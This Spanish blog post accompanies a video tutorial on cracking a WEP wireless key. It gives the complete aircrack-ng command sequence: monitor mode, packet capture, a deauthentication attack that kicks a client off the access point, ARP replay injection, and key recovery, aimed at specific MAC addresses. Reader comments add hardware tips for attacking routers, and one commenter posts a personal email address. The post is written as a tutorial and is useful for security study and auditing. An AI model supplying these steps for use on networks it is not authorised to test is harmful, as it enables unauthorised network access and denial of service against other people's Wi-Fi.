Video Cracking WEP - Desasociando un cliente conectado al AP
En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vÃdeo.
Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.
Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección de paquetes
Attack 0: Deauthentication + Attack 3: ARP Packets Injection = Key Found!! from delfirosales on Vimeo.
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng mon0
root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0
root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
root@bt:~# aircrack-ng captura-01.cap
VÃdeo Onlinehttp://youtu.be/jUeBo2qBNJg?hd=1
4 comentarios
hola .. mira komo te komentaba ..tengo un usb wifi wifly city de 2w rtl8187 ahora el problema es q inicio la makina virtual kon el backtrack 4 r2 .. y al kerer ponerla en modo monitor me sale ese error q publikaste aki tambien ..ahora hago el procedimiento para q se arregle ..pero depues me keda en monitor pero no en "mon0" sino en "wlan0" tu crees q eso sea el proble q no puedo inyectar paketes a routers ...salu2
ResponderEliminarBuenas sparko.
ResponderEliminarLo que te puedo decir es que ese no es el problema, ya que yo mismo he realizado ataques chopchop y de fragmentacion con el mismo chipset que tiene tu dispositivo USB.
Tengo tres dispositivos con el mismo chipset, el famoso rtl8187 y realizo auditorias utilizándolo como "Wlan0" tal como me lo detecta el airmon-ng.
Talvez en algunos dÃas, cuando tenga tiempo realizo un vÃdeo utilizando el chipset rtl8187 similar al tuyo y usándolo como wlan0.
Lo de tu problema si no se autentica correctamente puede ser por la distancia, o igual los nuevos router algunos que no se dejan. En algunos casos puedes utilizar este ataque que se muestra en el vÃdeo, si vez algún cliente conectado realiza estos pasos y seguro que obtienes la key.
Haber si en el mismo vÃdeo muestro también como se realiza un ataque a un AP con ESSID del tipo "delfi rosales" con espacios.
Igual lo que puedo comentarte de mi experiencia utilizando el chipset rtl8187 es que en la parte cuando quieres asociarte al AP por lo regular en algunos falla la asociación, aveces logra asociarse cambiando a una dirección MAC y en algunos casos no es necesario. Pero a lo que voy es que hasta ahorita me ha impresionado un dispositivo USB, el ALFA 2000mW sin duda es el mejor dispositivo que tengo, es mi mejor adquisición, aunque me costo 500 pesos mexicanos y los demás dispositivos me costaron en 200 pesos pero bien el alfa 2000mw lo vale, cada peso lo vale. Es el único dispositivo con el cual he ataco diferentes APs y a la primera todas asocia sin duda alguna, hasta ahorita no me he topado con que no se a podido asociar al AP, siempre se asocia correctamente sin cambiar la dirección MAC. Asà que si quieres en verdad un buen dispositivo sin duda te recomiendo el Alfa 2000mw, solo puedo decirte que es un dispositivo impresionante en cuanto ataques y no solo eso, también es muy bueno para entornos con mucho ruido, donde existen muchos APs sin duda conecta y navegas tranquilamente, en cambio los demás dispositivos que tengo en algunas ocasiones fallan, algunos solo muestran que tienen suficientes rallitas pero a la hora de conectar nomas no conectan.
Bueno espero haberte aclarado algo.
Saludos sparko.
Incluso puedes ver en este vÃdeo el alfa 2000mw en acción. Sin duda para mi es el mejor :P
ResponderEliminarhola sparko
ResponderEliminarlo que pasa que en la caja de la antena viene un cd o dvd que tienes que arrancarlo con la compu y te va salir el backtrack 3 y tambien viene un manual que todo esta en chino pero viene unas palabras en ingles y tienes que seguir los pasos y viene tambien te explica en dibujo y sigues los pasos para tu informacion unas de las mejores antenas es esa wifly city no estan trabajoza como la alfa.
yo compre varias antenas alfa y estoy teniendo el problema para deslaquearlas por eso entre a este titurial para poder deslaquearlas pero es mucho el problema y hazta orita no lo he solucionado despues de 2 meses te dejo mi correo carliux77@hotmail.com